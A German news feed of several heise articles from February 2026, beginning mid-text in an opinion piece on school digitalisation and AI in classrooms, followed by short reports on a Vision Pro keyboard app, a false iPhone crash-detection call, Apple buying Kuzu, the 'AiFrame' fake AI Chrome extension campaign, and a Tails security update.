Diese Frage stellt sich besonders dann, wenn Digitaltechnik ohne ein durchdachtes pädagogisches Konzept in die Klassenzimmer kommt. Wenn Schüler zwar Tablets und Laptops bedienen, aber niemand ihnen zeigt, wie sie diese Werkzeuge zum aktiven, selbst gesteuerten Lernen nutzen können. Wozu sie ja erst einmal befähigt werden müssten – durch Lehrkräfte, die selbst kaum fortgebildet werden.
Studien zeigen: Nicht Technik, sondern Pädagogik entscheidet über Lernerfolg
Und genau das ist das Problem: In Brandenburg werden Millionen in Hardware investiert, aber für die pädagogische Begleitung fehlen Zeit, Personal und wohl auch der politische Wille. Die Geräte sind da. Die Konzepte nicht.
Smartphones in der Schule: Studien belegen Leistungsabfall durch Ablenkung
Nehmen wir für einen Moment an, alle technischen Probleme wären gelöst – das Geld ist da, die IT-Experten sind da, das WLAN läuft. Was passiert dann am ersten Tag im Klassenzimmer?
Sofort taucht ein viel alltäglicheres, aber vielleicht noch größeres Problem auf: das private Smartphone in jeder Hosentasche.
Die Forschung dazu ist ziemlich eindeutig. Studien aus England und Spanien haben gezeigt, dass Handyverbote an Schulen die Leistungen der Schüler im Schnitt verbessern – und ganz besonders profitieren die leistungsschwächeren Schüler.
Was auch logisch erscheint: Wer sich ohnehin schon schwertut, dürfte für die schnelle Dopamin-Dusche von TikTok natürlich viel anfälliger sein.
Die große PISA-Studie von 2022 [6] bestätigt das: Schulen mit Handyverboten schneiden besser ab. Aber selbst an den Schulen, die offiziell ein Verbot haben, gaben 29 Prozent der Schüler an, ihr Handy trotzdem mehrmals am Tag zu nutzen. Fast jeder Dritte ignoriert das Verbot also einfach.
Die Zerrissenheit zeigt sich auch bei den Jugendlichen selbst. Die Mehrheit ist gegen ein Verbot – sie sagen, sie benötigen das Gerät für Kommunikation und Recherche. Gleichzeitig geben aber 71 Prozent, eine riesige Mehrheit, zu, dass ein Verbot ihnen helfen würde [7], sich besser zu konzentrieren.
Sie wissen also ganz genau, dass das Gerät ihnen schadet. Aber der Drang, es zu nutzen, ist stärker.
Die Lehrer stecken mittendrin in dieser Zwickmühle. Laut einer EU-Umfrage vom Juni 2025 sieht eine absolute Mehrheit der Lehrkräfte negative Auswirkungen auf die Konzentration und über die Hälfte sogar auf die soziale Interaktion.
Eine niederländische Monitoring-Studie [8] hat genau das untersucht: Dort, wo es strikte Regeln gibt, berichten Lehrer und sogar Schüler von einem besseren Sozialklima. In den Pausen wird wieder mehr geredet, es wird gespielt, es gibt mehr direkten Augenkontakt. Die Niederländer haben dafür ein wunderbares Modell entwickelt: "Thuis of in de kluis" – zu Hause oder im Spind.
Doch das Problem verschwindet nicht immer, es verlagert sich nur. Das ist der sogenannte Verdrängungseffekt: Wenn das Handy im Spind ist, klappen manche Schüler eben den Laptop auf und sind dann dort auf Social Media. Man verbannt also das private Ablenkungsgerät, um dann das schulische Ablenkungsgerät einzuführen.
Das wirkt nicht zu Ende gedacht.
Verlernen Schüler das Denken? Neurowissenschaftliche Warnungen vor digitaler Abhängigkeit
Der Neurowissenschaftler Manfred Spitzer hat das schon vor über einem Jahrzehnt als "digitale Demenz" bezeichnet. Das Prinzip dahinter ist "Use it or lose it" – benutze es oder verliere es. Kognitive Fähigkeiten wie Gedächtnis, Konzentration und Problemlösung sind wie Muskeln. Sie wachsen nur, wenn man sie regelmäßig und eigenständig anstrengt.
Wenn der Orientierungssinn ständig an Google Maps [9] ausgelagert wird, verkümmert das Gehirn in diesem Bereich. Und wenn Denkprozesse systematisch an Maschinen ausgelagert werden, bilden sich die dafür notwendigen neuronalen Bahnen gar nicht erst robust aus.
Das deckt sich mit einer beunruhigenden Beobachtung: dem negativen Flynn-Effekt [10]. Das ganze 20. Jahrhundert über wurde jede Generation im Schnitt messbar intelligenter als die davor – der durchschnittliche IQ stieg und stieg.
Doch ungefähr Mitte der 2000er-Jahre, als das Smartphone seinen Siegeszug antrat, hat dieser Fahrstuhl in vielen westlichen Ländern angehalten. An manchen Orten hat er sogar angefangen, wieder nach unten zu fahren.
Stufe 1: Lernen wird ersetzt. Schüler lassen sich von ChatGPT die Hausaufgaben machen [12]. Sie kopieren, statt zu verstehen. Der Lernerfolg ist sehr gering – sobald ein Test ohne KI geschrieben wird, fliegen diese Schüler auf.
Ein Schulleiter bestätigt das aus der Praxis. Er sagt wörtlich, der Lernerfolg bei Schülern, die KI für die Aufgaben nutzen, sei "sehr, sehr gering". Er sieht das jeden Tag in seinem Klassenzimmer. Stufe 1 ist bereits Realität.
Stufe 2: Denken bildet sich gar nicht erst aus. Das Gehirn funktioniert nach dem Prinzip "Use it or lose it". Wenn bestimmte Denkprozesse – logisches Schließen, Argumente aufbauen, kreativ Probleme lösen – permanent an eine Maschine ausgelagert werden, dann bilden sich die neuronalen Bahnen dafür gar nicht erst richtig aus. Oder sie verkümmern. Eine ganze Generation trainiert diese mentalen Muskeln nicht mehr ausreichend.
Stufe 3: Denken wird rational aufgegeben. Bei einem Treffen am Institute for Advanced Study in Princeton berichteten Spitzenforscher, dass sie das eigenständige Denken bewusst aufgeben – nicht aus Faulheit, sondern aus reiner ökonomischer Vernunft.
Einer von ihnen sagte, die KI erledige 90 Prozent seiner Arbeit in wenigen Stunden – schneller, besser und billiger. Selbst zu denken, sei für ihn zu einem Wettbewerbsnachteil geworden.
Es ist also keine Frage des Könnens mehr, sondern des ökonomischen Dürfens. Selbst denken wird ineffizient. Es lohnt sich nicht mehr.
Digitalisierung in Japan: Warum einige Schulen wieder auf Papier setzen
Genau diese Sorge treibt auch einen Schulleiter des Niedersorbischen Gymnasiums in Cottbus um. Er erzählt eine Anekdote, die aufhorchen lässt: Ein Kollege von einem anderen Gymnasium sei vor einigen Jahren zu Besuch bei seiner japanischen Partnerschule gewesen. Früher hätte er davon geschwärmt, wie hochgradig digitalisiert dort alles war, wie weit Japan Deutschland voraus sei.
Bei seinem letzten Besuch habe er eine andere Situation vorgefunden: Kreidetafeln, Stift und Papier – die digitale Ausstattung sei teilweise wieder abgebaut worden. Die Japaner, so seine Beobachtung, hätten die negativen Effekte auf die kognitiven Fähigkeiten und die Konzentration der Schüler erkannt.
Nun ist das zunächst nur anekdotische Evidenz, die Beobachtung eines einzelnen Besuchers an einer einzelnen Schule. Tatsächlich hat Japan die Digitalisierung keineswegs flächendeckend zurückgedreht – im Gegenteil.
Doch die Anekdote verweist auf etwas Reales: In Japan gibt es eine intensive gesellschaftliche Diskussion darüber, bis zu welchem Punkt die Digitalisierung wirklich hilfreich ist und das schulische Leistungsniveau fördert. Man hat die wissenschaftlichen Erkenntnisse auch in der eigenen Gesellschaft bestätigt gefunden.
So sind manche Schulen dazu übergegangen, bestimmte Tätigkeiten wieder auf Papier statt am Tablet erledigen zu lassen – nicht aus Technikfeindlichkeit, sondern aus pädagogischer Überlegung.
Ein durchgehender Trend ist das nicht. Aber es zeigt: Selbst in einem Land, das als Vorreiter der Digitalisierung gilt, wird die Frage gestellt, die in Deutschland kaum jemand zu stellen wagt. Die Frage nach den Grenzen.
In dem Moment, in dem Deutschland mit Milliardenaufwand die Digitalisierung vorantreibt, führen andere Länder bereits die Debatte, die hier noch aussteht: Wie viel Bildschirm verträgt ein Gehirn im Wachstum? Und wann kippt der Nutzen in Schaden?
USA und Generation Z: Sinkende Testergebnisse trotz Digitalisierung
Das Beispiel Japan zeigt: Die Diskussion über die Schattenseiten der Digitalisierung wird weltweit geführt – nicht nur bei uns. In den USA hat das Thema inzwischen den Kongress erreicht.
Im Februar 2026 sagte der Neurowissenschaftler [13] Jared Cooney Horvath vor dem Senatsausschuss für Handel, Wissenschaft und Technologie aus und präsentierte den Abgeordneten eine erschütternde Bilanz.
Seine Kernbotschaft: Die Generation Z, also die zwischen 1997 und 2010 Geborenen, ist die erste Generation in der modernen Geschichte, die in standardisierten akademischen Tests schlechter abschneidet als die Generation vor ihr.
"Sie schnitten bei praktisch allen kognitiven Messungen schlecht ab", erklärte Horvath [14], "von grundlegender Aufmerksamkeit, Gedächtnis, Lese- und Schreibfähigkeit, Rechenfähigkeit, exekutiven Funktionen hin zum allgemeinen IQ."
Der negative Flynn-Effekt, den Forscher schon länger beobachten, hat damit einen Namen und ein Gesicht bekommen. Horvath, der an Universitäten wie Harvard und der University of Melbourne gelehrt hat, sieht einen klaren Zusammenhang: Die Generation Z ist die erste, die mit ständiger Bildschirmzeit aufgewachsen ist.
"Mehr als die Hälfte der Zeit, in der ein Teenager wach ist, verbringt er damit, auf einen Bildschirm zu starren", sagte er vor dem Kongress.
"Menschen sind biologisch darauf programmiert, von anderen Menschen und durch intensives Lernen zu lernen, nicht durch das Blättern in Bildschirmen nach stichpunktartigen Zusammenfassungen."
Seine Analyse von Daten aus 80 Ländern zeigt ein wiederkehrendes Muster: Sobald Länder digitale Technologien in großem Umfang in Schulen einführen, gehen die Leistungen zurück.
Das ist keine Technikfeindlichkeit. "Ich bin nicht gegen Technologie. Ich bin für Strenge", betont Horvath. Sein Plädoyer: Schulen sollten die Bildschirmzeit für Schüler begrenzen und zu bewährten Methoden zurückkehren – Bücher aufschlagen, konzentriert lernen, sich anstrengen.
Die Aussage vor dem Kongress endet mit einem Satz, der nachdenklich macht:
"Seit Ende des 19. Jahrhunderts standardisieren und messen wir die kognitive Entwicklung. Jede Generation hat ihre Eltern übertroffen. Bis zur Generation Z."
Mehr KI in Schulen trotz Leistungsrückgang? Der politische Widerspruch
Mitten in dieser Entwicklung kommt die große Politik mit der Forderung: mehr KI für alle. EU und OECD argumentieren [15], KI sei nun mal da, wir müssten unseren Kindern beibringen, damit umzugehen.
Gleichzeitig warnen dieselben Organisationen, dass das nur mit "hoch spezialisierten, pädagogisch durchdachten und sicheren KI-Werkzeugen" geschehen dürfe.
Und stattdessen führt man in Brandenburg mit Telli einen Allzweck-Chatbot ein, dessen Ergebnisse die Lehrer als nutzlosen "Schaum" bezeichnen. Das passt nicht zusammen.
Zeitgleich zur Einführung von tausenden neuen Schulgeräten wird in ganz Europa hitzig über Handyverbote an Schulen diskutiert. Man verbannt also das private Ablenkungsgerät, um dann das schulische Ablenkungsgerät einzuführen.
Digitale Kompetenz: Konsumieren oder Technologie verstehen?
Genau bei diesem Widerspruch setzt der Schulleiter aus Cottbus mit seiner entscheidenden Frage an: Was wollen wir eigentlich erreichen? Was bedeutet digitale Kompetenz wirklich?
Für ihn ist es eben nicht, dass Schüler lernen, eine App wie Kahoot zu bedienen. Das, so sagt er, sei nur die passive Rolle des Nutzers, des Konsumenten. Echte Kompetenz beginne da, wo man die Prozesse dahinter verstehe, wo man vielleicht anfange zu programmieren, wo man die Technik nicht nur anwende, sondern sie aktiv gestalte und kritisch hinterfrage.
"Und Schule hat, glaube ich, die Aufgabe, nicht zu nutzen, sondern zu gestalten", sagt er.
"Wenn ich Mathe nicht beherrsche und wenn ich Terme nicht beherrsche, dann brauche ich mit Excel überhaupt nicht anzufangen. Das ist ein komplexes Programm. Wer da gut drin ist, der wird das nicht über Intuitivität erlernt haben."
Schul-Digitalisierung am Scheideweg: Mehr Technik oder mehr Pädagogik?
Wir stehen in gewisser Weise an einer Weggabelung. Auf der einen Seite die massive politische Anstrengung, die Schulen digital aufzurüsten – Milliarden fließen in Kabel, Geräte und Software. Auf der anderen Seite ein wachsender Chor von Warnern, gestützt durch Studien.
Die Sorgen reichen von der ganz konkreten Ablenkung durch das Smartphone über ein nachweislich oberflächlicheres Lernen am Bildschirm bis hin zur fundamentalen Gefahr der kognitiven Verarmung.
Die vielleicht wichtigste Erkenntnis aus den Dokumenten ist, dass sich die Debatte gerade verschiebt. Es geht nicht mehr um das simple Ja oder Nein zur Technologie – es geht um das Wie, um die Art und Weise der Integration.
Drei zentrale Erkenntnisse zur Digitalisierung an Schulen
Drei Erkenntnisse stechen hervor:
Erstens: Der Plan ist groß, aber die Realität ist ein Flickenteppich. Brandenburgs Digitalisierung ist voller guter Absichten, aber die Umsetzung bei Infrastruktur, Finanzierung und Support ist uneinheitlich und oft nicht nachhaltig.
Zwischen dem Gymnasium in Dahme-Spreewald mit Glasfaser und stabilem WLAN und dem Gymnasium in Forst mit seiner 200-Mbit-Leitung liegen Welten – obwohl beide im selben Bundesland liegen.
Zweitens: Es klafft eine riesige Lücke zwischen dem, was an Technik hingestellt wird, und dem, was wirklich im Alltag ankommt und Sinn stiftet. Die ungenutzten Laptops in den Schränken von Brandenburg an der Havel und der von den Lehrern verschmähte KI-Chatbot Telli sind die perfekten, fast schon tragischen Symbole dafür.
Drittens: Die größte Sorge, die aus den Quellen spricht, ist nicht, dass die Technik versagt. Die größte Sorge ist, dass sie zu gut funktioniert – so gut, dass sie das eigenständige, kritische, manchmal auch mühsame Denken überflüssig und ökonomisch ineffizient macht. Nicht das Versagen ist die Gefahr, sondern der Erfolg der Technologie.
Schul-Digitalisierung und Zukunft des Denkens: Was steht wirklich auf dem Spiel?
Die Dokumente legen nahe, dass wir uns gerade mitten in einem riesigen, unkontrollierten Experiment an den Gehirnen der nächsten Generation befinden.
Die Frage ist also nicht nur: Wie digitalisieren wir unsere Schulen besser? Die viel wichtigere Frage lautet: Welche Art von Denkern wollen wir als Gesellschaft eigentlich hervorbringen? Und führt uns der Weg, den wir gerade mit Vollgas einschlagen, wirklich dorthin?
Die wirklich unbequeme Frage, die sich noch kaum jemand zu stellen traut, lautet: Warum sollten wir in Zukunft überhaupt noch selbst denken [16], wenn es – wie der Forscher in Princeton sagt – ökonomisch keinen Vorteil mehr bringt?
URL dieses Artikels: https://www.heise.de/-11176841
AirKeyboard Pro: „All-Finger“-Tastatur für die Vision Pro
Von Heise — 16. Februar 2026 um 13:00
AirKeyboard Pro in Aktion: Leider nicht als Standardtastatur nutzbar.
(Bild: 10th Dimension, LLC)
Mehr als Ein-Finger-Suchsystem: Es gibt die erste externe Softwaretastatur für visionOS. Allerdings mit technischen Einschränkungen.
Die Vision Pro kommt standardmäßig mit einer On-Screen-Tastatur, die Apple in visionOS integriert hat. Sie ermöglicht ein Tippen in der Luft, funktioniert vergleichsweise gut, liefert aber nur ein unterdurchschnittliches Tippgefühl. Im Zehn-Finger-System lässt sie sich zudem nicht nutzen. Entwickler José Buelto sieht hier deshalb nun eine Marktlücke und hat die laut eigenen Angaben erste „All-Finger“-Tastatur für Apples Computerbrille auf den Markt gebracht. Die App muss allerdings systembedingt mit Einschränkungen leben – und kostengünstig ist sie auch nicht.
Virtuell-physische Tastaturnachbildung
Das Produkt nennt sich AirKeyboard Pro [1] und steht in Apples App Store zum Download bereit. Zum Herunterladen werden zunächst knapp 10 Euro Gebühr fällig. Dabei bleibt es allerdings nicht: Will man später weiter Tastaturen nachkaufen, etwa ein Modell aus Holz oder eine RGB-Tastatur mit Ziffernblock, werden weitere Gebühren zwischen 2,99 und 3,99 Euro fällig – pro Tastatur. Zudem ist es nicht möglich, AirKeyboard Pro als Standardtastatur unter visionOS zu verwenden, da eine entsprechende Schnittstelle, wie man sie von iOS kennt, bislang fehlt. Stattdessen nutzt man die App und muss Inhalte herauskopieren. In der Praxis stellt sie einen einfachen Texteditor samt Spezialtastatur dar.
Diese lässt sich vergleichsweise frei im Raum positionieren, beispielsweise auf einem vorhandenen Tisch (im Passthrough-Modus). Buelto behauptet zwar, dass man mit zehn Fingern gleichzeitig tippen kann, in der Praxis ging das aber nicht vollständig. Störend ist auch, dass die App standardmäßig eine Autokorrektur integriert, die, falls die Spracheinstellung nicht stimmt (man also etwa in einem englischen System auf Deutsch tippt), zu Fehlern neigt. Bei derart „physischen“ Tastaturen wäre es sinnvoller, wenn die Autokorrektur zunächst deaktiviert wäre, weil man sonst kein Tippgefühl entwickeln kann.
Fehlende Systemintegration
Dennoch macht das Projekt einen interessanten Eindruck. Buelto verspricht zudem, es regelmäßig weiterzuentwickeln. Eine bessere Integration ins System kann jedoch nur Apple leisten. Solange dies nicht umgesetzt wird, müssen Nutzer mit Copy & Paste leben, was die Arbeit verlangsamt.
Als reine Notiz-App ist AirKeyboard Pro zudem zu schlicht gestaltet – insbesondere bei dem Preis.
URL dieses Artikels: https://www.heise.de/-11173863
Links in diesem Artikel: [1] https://apps.apple.com/de/app/airkeyboard-pro/id6753933755 [2] https://www.heise.de/Datenschutzerklaerung-der-Heise-Medien-GmbH-Co-KG-4860.html [3] https://www.heise.de/mac-and-i [4] mailto:bsc@heise.de
Crash Detection: Auf dem Autodach vergessenes iPhone stürzt ab und sendet Notruf
Von Heise — 16. Februar 2026 um 12:03
(Bild: Pradeep Thomas Thundiyil/Shutterstock.com)
Bei Eisleben hat ein herrenloses iPhone am Sonntag automatisch einen Notruf abgesetzt. Es war auf einem Autodach vergessen worden und dann heruntergefallen.
Im Süden Sachsen-Anhalts hat ein verloren gegangenes Smartphone am Sonntag einen automatischen Notruf ausgelöst und zu einem Einsatz von Rettungskräften sowie Polizei geführt. Das berichtet die Nachrichtenagentur dpa unter Berufung auf die Polizeiinspektion Halle. Ereignet hat sich der Vorfall in der Nähe von Eisleben, das iPhone war vorher auf dem Autodach abgelegt worden und dann an einer Kreuzung heruntergefallen. Dabei hat die Unfallerkennung (Crash Detection) den automatischen Notruf ausgelöst. Als die Polizei und die Rettungskräfte den gemeldeten Ort erreichten, fanden sie keine Person, die Hilfe benötigte, sondern lediglich das am Straßenrand liegende Smartphone. Der Besitzer des Telefons habe schnell ausfindig gemacht werden können und sein Gerät zurückerhalten.
Kein Einzelfall
Apples Unfallerkennung ist seit dem Jahr 2022 Teil von aktuellen iPhones und Apple-Watch-Computeruhren, sie soll bei Autounfällen schnell für Hilfe sorgen. Die Geräte fragen dafür Daten verschiedener Sensoren ab und Algorithmen entscheiden dann im Einzelfall, ob der Ernstfall tatsächlich eingetreten ist oder nicht. Wenn die Unfallerkennung aktiv ist, kontaktiert eine Apple Watch oder ein iPhone den Rettungsdienst danach aber erst, wenn der Nutzer oder die Nutzerin den Notruf nicht innerhalb von 40 Sekunden abweist. Dann werden die aktuellen Standortdaten übermittelt, damit das verunfallte Fahrzeug schnell gefunden werden kann.
Nachdem Apple die Crash Detection eingeführt hat, gab es immer wieder Berichte über Fehlalarme. Unter anderem in Skigebieten und Freizeitparks wurde die Funktion unerwünscht ausgelöst [1]. Vor zwei Jahren hat ein Fall in den USA für Aufsehen gesorgt [2], als ein Gerät um Hilfe gerufen hat, der Besitzer sich aber selbst Hilfe gesucht hat. Er wurde dann unter anderem mit einem Helikopter gesucht. Der Fall bei Eisleben ist nun nicht einmal der erste in Sachsen-Anhalt, bei dem ein auf dem Dach vergessenes Smartphone die Polizei gerufen hat. Ende 2023 ist so etwas schon einmal bei Rottleberode passiert [3]. Die Polizei hat damals darum gebeten, „Verkehrsteilnehmer mögen ihre Sachen sicher verstauen, um mögliche Gefahren zu minimieren oder Fehlalarme zu verhindern“.
URL dieses Artikels: https://www.heise.de/-11177564
Links in diesem Artikel: [1] https://www.heise.de/news/Fehlalarme-durch-iPhone-14-Apples-Unfallerkennung-laesst-Leitstellen-aechzen-7486815.html [2] https://www.heise.de/news/Apple-Watch-Unfallerkennung-ruft-Polizei-doch-der-Fahrer-ist-schon-weg-9589300.html [3] https://polizei.sachsen-anhalt.de/das-sind-wir/presse/pi-halle-saale/mansfeld-suedharz?tx_tsarssinclude_pi1%5Baction%5D=single&tx_tsarssinclude_pi1%5Bcontroller%5D=Base&tx_tsarssinclude_pi1%5Buid%5D=443400&cHash=eb65a9355945c9ef640bb9a50268de64 [4] https://www.heise.de/newsletter/anmeldung.html?id=ki-update&wt_mc=intern.red.ho.ho_nl_ki.ho.markenbanner.markenbanner [5] mailto:mho@heise.de
Schnelle, flexible Graph-Datenbanken ließen sich mit Kuzu erstellen. Das Unternehmen wurde ohne große Ankündigung von Apple geschluckt.
Kommt neben der Textverarbeitung Pages, der Tabellenkalkulation Numbers und dem Präsentationsprogramm Keynote bald auch eine Datenbank von Apple? Die dafür notwendige Technik hat sich der iPhone-Konzern mittlerweile eingekauft, wie aus Daten der Europäischen Union hervorgeht. Die kanadische Firma Kuzu, Hersteller eines flexiblen Datenbanksystems auf Graph-Basis, gehört demnach bereits seit Herbst dem Unternehmen aus Cupertino. Gleichzeitig wurde auch das GitHub-Repo von Kuzu gestrichen, es hat einen Archivstatus von Oktober 2025. Die Datenbanktechnik von Kuzu stand als Embedded-Variante bereit und soll für „Geschwindigkeit, Skalierbarkeit und Nutzerfreundlichkeit“ optimiert gewesen sein. Graph-Datenbanken arbeiten anders als die üblicheren relationalen Datenbanken.
Apple hat schon FileMaker
Laut AppleInsider, dem die EU-Dokumente vorliegen, könnte die Technik die Grundlage für eine neue Datenbank-App legen [1] – oder aber für interne Zwecke gedacht sein. Tatsächlich hat Apple mit FileMaker Pro der Tochter Claris seit Jahrzehnten bereits ein entsprechendes Produkt, das aber nach wie vor nicht als Apple-Technik vermarktet wird. Claris gehört bereits seit 1987 zu Apple und arbeitet still weiter – zuletzt war im letzten Jahr Version 22 erschienen. Die App ist sogar Cross-Plattform, läuft also auch unter Windows, die Server-Version sogar unter Linux (Ubuntu).
Auf Reddit wurde ein Posting zum Status von Kuzu, das als Inc. operierte [2], gelöscht, auch dort heißt es, die Firma sei übernommen worden. Dort geht man von einem Acqui-Hire aus, also einer Übernahme zum Zwecke der Anwerbung der Mitarbeiter – wobei sich Apple explizit für die Technik interessieren dürfte.
Auch Prompt AI und Q.AI
Zu einem ähnlichen Zeitpunkt übernahm Apple offenbar auch die Firma Prompt AI [3], offenbar vor allem wegen der Mitarbeiter. Das Geld soll nicht ausgereicht haben, damit die bisherigen Investoren etwas verdienen. Wie das bei Kuzu aussah, ist unklar.
Apple hatte kürzlich auch eine besonders große Übernahme mitgeteilt: Die israelische Firma Q.AI wurde für gut zwei Milliarden US-Dollar gekauft. Sie hat eine Technik entwickelt, mit der KI Sprache erkennen kann [4], die komplett leise ausgesprochen wird.
URL dieses Artikels: https://www.heise.de/-11175223
Links in diesem Artikel: [1] https://appleinsider.com/articles/26/02/11/faster-more-flexible-databases-could-be-coming-to-filemaker-or-iwork [2] https://www.reddit.com/r/Database/comments/1o3w73z/status_of_kuzudb_from_kuzu_inc/ [3] https://www.cnbc.com/2025/10/10/apple-nears-deal-to-acquire-talent-tech-from-ai-startup-prompt-ai.html [4] https://www.heise.de/news/Apple-kauft-KI-Start-up-Q-AI-fuer-Milliarden-11160150.html [5] https://www.heise.de/Datenschutzerklaerung-der-Heise-Medien-GmbH-Co-KG-4860.html [6] https://www.heise.de/mac-and-i [7] mailto:bsc@heise.de
Falsche KI-Erweiterungen für Chrome gefährden 260.000 Nutzer
Von Heise — 16. Februar 2026 um 09:51
(Bild: Stokkete/Shutterstock.com)
IT-Forscher haben zig Chrome-Erweiterungen auf eine Kampagne zurückgeführt, die Informationen von 260.000 Nutzern gefährdet.
Zig Chrome-Erweiterungen, die von mehr als 260.000 Nutzern und Nutzerinnen installiert wurden, sind Teil einer Kampagne, die es auf Daten und Informationen der Opfer abgesehen hat. Die kriminellen Hinterleute umgehen dazu auch Sicherheitsvorkehrungen des Chrome-Stores.
IT-Sicherheitsforscher von LayerX haben die „AiFrame“ genannte Erweiterungskampagne analysiert und die Ergebnisse in einem aktuellen Blog-Beitrag [1] veröffentlicht. Die Täter bieten vermeintliche KI-Assistenten zum Zusammenfassen, Chatten, Schreiben oder als Gmail-Assistent in Form von Erweiterungen für den Webbrowser [2]Chrome [3] an. Die Erweiterungen wirken oberflächlich legitim, fußen aber auf einer gefährlichen Architektur. Viele Funktionen der Erweiterungen haben die Drahtzieher nicht lokal implementiert, sondern betten dazu serverseitige Schnittstellen aus dem Internet ein und funktionieren so als privilegierte Proxys, die der Infrastruktur aus dem Netz Zugriff auf sensible Browser-Fähigkeiten gewähren.
30 Erweiterungen mit 260.000 Installationen
Die Analysten haben über 30 unterschiedliche Chrome-Erweiterungen, die mit unterschiedlichen IDs und Namen veröffentlicht wurden, aber derselben darunterliegenden Codebasis, Berechtigungen und Backend-Infrastruktur entdeckt. Sie wurden zusammen mehr als 260.000 Mal installiert – einige davon waren zeitweise im Chrome Web Store als empfohlen (Featured) markiert, was ihre vermeintliche Legitimität erhöhte. Als Köder dienen bekannte Namen wie Claude, ChatGPT, Gemini sowie Grok, aber auch als allgemeines „AI Gmail“-Tool werden die bösartigen Erweiterungen beworben und verteilt.
Die Analyse schaut detaillierter auf die Erweiterungen. Trotz unterschiedlicher Namen und IDs teilen sie sich dieselbe interne Struktur, dieselbe JavaScript-Logik, Berechtigungen sowie Backend-Infrastruktur. Es handelt sich daher um eine koordinierte Operation anstatt um eigenständige Werkzeuge. Es handelt sich den IT-Forschern zufolge um sogenanntes „Extension Spraying“, bei dem die Angreifer Auswirkungen von entfernten Erweiterungen und reputationsbasierten Abwehrmechanismen umgehen, indem sie einfach unter neuem Namen weitere Erweiterungen in den Store einstellen.
Kritisch ist, dass ein signifikanter Anteil der Funktionen der Erweiterungen durch im Netz gehostete Komponenten geliefert wird. Dadurch bestimmt sich ihr Laufzeitverhalten durch serverseitige Änderungen und nicht durch zur Installationszeit im Chrome-Web-Store untersuchten Code. Das ermöglicht somit die Umgehung von einem Teil von Googles Sicherheitsmechanismen. Die Kernkomponente wird dabei als Iframe vom Server eingebunden, der in Vollbildgröße dargestellt wird. Er überlagert die aktuelle Webseite und stellt visuell das Nutzerinterface der Erweiterung dar.
Spionagefunktionen
Auf Geheiß des serverseitigen Iframes analysiert die Erweiterung den aktiven Browser-Tab und extrahiert dessen Inhalt, den sie an den Server schickt. Das können auch sensible Informationen von Seiten sein, in denen Opfer gerade angemeldet sind. Das Iframe kann die Erweiterung auch anweisen, die Stimmenerkennung der Web-Speech-API zu starten, woraufhin diese dann ein Transkript an die entfernte Seite schickt – ein leicht auswertbarer Mitschnitt der Kommunikation ist möglich; jedoch begrenzen Browser-Berechtigungen in einigen Fällen den möglichen Missbrauch, erklären die IT-Forscher.
Der Command-and-Control-Server liegt auf der Haupt-Domain tapnetic[.]pro, wobei die einzelnen Erweiterungen unterschiedliche Subdomains davon aufrufen. Die Seite scheint auf den ersten Blick legitim, allerdings gibt es dort keine Funktionen, Downloads oder mögliche Nutzerinteraktionen. Es gibt dort auch kein klar benanntes Produkt oder auch keine Dienstleistung, somit handelt es sich offenbar um eine Tarnseite. Die Kampagne läuft bereits seit Längerem. Schon vor rund einem Jahr haben die Analysten eine Erweiterung aus dieser Kampagne untersucht, sie wurde aus dem Chrome-Web-Store am 6. Februar 2025 entfernt. Zwei Wochen später wurde sie unter neuer Erweiterungs-ID neu eingestellt und veröffentlicht.
Am Ende der Analyse liefern die IT-Forscher eine Auflistung von Indizien für Infektionen (Indicators of Compromise, IOCs). Dort benennen sie etwa IDs, Namen und Anzahl an aktiven Installationen der bislang entdeckten, schädlichen „AiFrame“-Erweiterungen.
Browser-Erweiterungen stellen ein beliebtes Einfallstor für Cyberkriminelle dar. Immer wieder fallen sie für diverse Webbrowser negativ auf. Anfang vergangenen Jahres konnten sich etwa Täter Zugriff auf Konten von Entwicklern diverser Chrome-Extensions verschaffen [4] und den Code durch schädliche Fassungen der Erweiterungen ersetzen.
URL dieses Artikels: https://www.heise.de/-11177317
Links in diesem Artikel: [1] https://layerxsecurity.com/blog/aiframe-fake-ai-assistant-extensions-targeting-260000-chrome-users-via-injected-iframes/ [2] https://www.heise.de/thema/Browser [3] https://www.heise.de/thema/Chrome [4] https://www.heise.de/news/Nach-Phishing-Angriff-Schaedliche-Erweiterungen-in-Chrome-Web-Store-geschleust-10224745.html [5] https://pro.heise.de/security/?LPID=39555_HS1L0001_27416_999_0&wt_mc=disp.fd.security-pro.security_pro24.disp.disp.disp [6] mailto:dmk@heise.de
Der Kernel älterer Tails-Versionen enthält Sicherheitslücken. Version 7.4.2 der anonymisierenden Linux-Distribution schließt sie.
Die Entwickler der anonymisierenden Linux [1]-Distribution Tails haben Version 7.4.2 herausgegeben, die sie selbst als Notfallupdate bezeichnen. Darin schließen sie mehrere Sicherheitslücken im Linux-Kernel.
In der Versionsankündigung von Tails 7.4.2 [2] erklären sie, dass diese Version ein „Notfall-Release zum Beheben kritischer Sicherheitsschwachstellen im Linux-Kernel“ darstellt. Die Sicherheitsmitteilung DSA 6126-1 [3] zum aktualisierten Debian-Kernel 6.12.69-1 umfasst mehr als hundert Schwachstellen; nicht jede davon ist jedoch schwerwiegend. Die Folgen wären jedoch fatal: „Wenn Angreifer in der Lage sind, andere, bislang unbekannte Schwachstellen in einer in Tails enthaltenen Software zu missbrauchen, können sie durch DSA 6126-1 die volle Kontrolle über dein Tails erlangen und dich deanonymisieren“, führen die Tails-Programmierer aus.
Schwachstellen schwer auszunutzen
Jedoch seien Angriffe sehr unwahrscheinlich, heben sie hervor. Sie könnten jedoch von „starken Angreifern wie Regierungen oder Hacking-Firmen durchgeführt werden“. Die Tails-Maintainer haben keine Kenntnis darüber, dass derartige Attacken in der Praxis ausgeführt wurden.
Die neue Tails-Fassung hat zudem den Mail-Client Thunderbird in Version 140.7.1 an Bord. Die Programmierer haben Probleme etwa beim Öffnen der WLAN-Einstellungen aus dem Tor-Verbindungsassistenten heraus gelöst. Das erneute Öffnen von Electrum soll nun wieder klappen, wenn es zuvor nicht sauber geschlossen wurde. Zudem haben sie korrigiert, dass die ausgewählte und auf USB-Stick gespeicherte Sprache im Willkommen-Dialog angewendet wird.
Wie üblich steht die aktuelle Tails-Version als Abbild zum Verfrachten auf USB-Sticks [4] und als ISO-Image für VMs [5] oder zum Brennen auf DVDs zum Herunterladen auf der Tor-Webseite bereit. Die Version für den USB-Stick können Interessierte unterwegs dabeihaben, um damit auf fremden Rechnern eine gesicherte und geschützte Umgebung zum anonymen Surfen im Netz zu starten. Damit lassen sich etwa Zensurmaßnahmen umgehen.
